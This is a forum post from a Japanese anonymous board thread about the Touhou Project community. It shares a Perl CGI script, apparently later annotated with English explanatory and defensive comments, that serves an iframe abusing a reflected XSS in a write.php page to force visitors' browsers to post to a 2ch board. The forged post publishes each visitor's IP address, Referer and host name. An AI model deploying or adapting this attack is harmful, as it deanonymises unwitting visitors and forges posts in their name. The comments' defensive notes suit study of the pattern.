東方Project総合ヲチ&アンチスレ 30

106名無しさん@ゴーゴーゴーゴー!

びんたんのCSRFが対策されたのでソース貼っておくか

#!/usr/local/bin/perl
#
# CGI script that answers every request with an HTML page holding one <iframe>.
# The iframe URL targets write.php on cheese.ula.cc and carries percent-encoded
# HTML in its `server` parameter. Decoded, that value closes the page's own
# form, adds a form named "hage" that POSTs to bbs.cgi on awabi.2ch.net, and
# adds a script that submits that form at once. This only has an effect if
# write.php echoes `server` into its HTML without encoding it (reflected XSS
# used to drive a cross-site POST); the post that shares this script says the
# issue has been fixed.
#
# Defensive takeaways: HTML-encode the reflected parameter on output; on the
# board side require a per-session token or an Origin/Referer check for POSTs
# to bbs.cgi; in web logs, a `server=` value carrying encoded <form> or <script>
# markup is the indicator for this pattern.

use strict;

# Visitor's address and Referer as the web server passes them to the CGI.
my $ADDR = $ENV{REMOTE_ADDR};
my $REF = $ENV{HTTP_REFERER};
# Reverse lookup of the dotted-quad address (2 is presumably AF_INET — confirm
# for the platform); falls back to the raw address when no name is returned.
my $HOST = gethostbyaddr(pack('C4', split(/\./, $ADDR)), 2) || $ADDR;
my $key = "1336206209"; # thread key
my $TIME = time; # current epoch seconds, sent as the form's `time` field

print "Content-Type: text/html\n\n";
# The heredoc interpolates $TIME, $key, $ADDR, $REF and $HOST. The last three
# land inside the MESSAGE textarea, so the forced post would publish the
# visitor's address, Referer and host name. FROM is set to "fusianasan", a name
# 2ch-style boards are known to replace with the poster's host — confirm.
# The rest of MESSAGE is percent-encoded non-ASCII bytes (not decoded here).
# NOTE(review): the line breaks inside the URL look like wrapping added by the
# page this was pasted on; as written they end up inside the src attribute.
print <<EOL;
<iframe src="http://cheese.ula.cc/test/write.php?server=%22%3E%3C/form%3E%3Cform%20name=hage%20action=http://awabi.2ch.net/test/bbs.cgi%20method=post%3E%3Cinput%20name=
bbs%20value=net%3E%3Cinput%20name=time%20value=$TIME%3E%3Cinput%20name=key%20value=$key%3E%3Cinput%20name=yuki%20value=akari%3E%3Cinput%20name=FROM%20value=fusianasan%3
E%3cinput%20name%3dmail%20value%3d%3e%3Ctextarea%20name=MESSAGE%3E%83S%83%7e%83A%83%93%83%60%82%cc%8e%a9%8eE%82%cd%82%dc%82%be%82%c5%82%b7%82%a9%81%60%81%60%81%60%81%60
%81%60%81%60%81H%81H%81H%81H%81H%81H%81H%0d%0a%90%bc%83m%8b%7b%20%81%9fWfo7Kpppz2%82%e6%82%e8%0d%0a%0d%0a$ADDR $REF $HOST%3C/textarea%3E%3Cinput%20type=submit%3E%3Cscri
pt%3Edocument.hage.submit();%3C/script%3E">
EOL
   exit;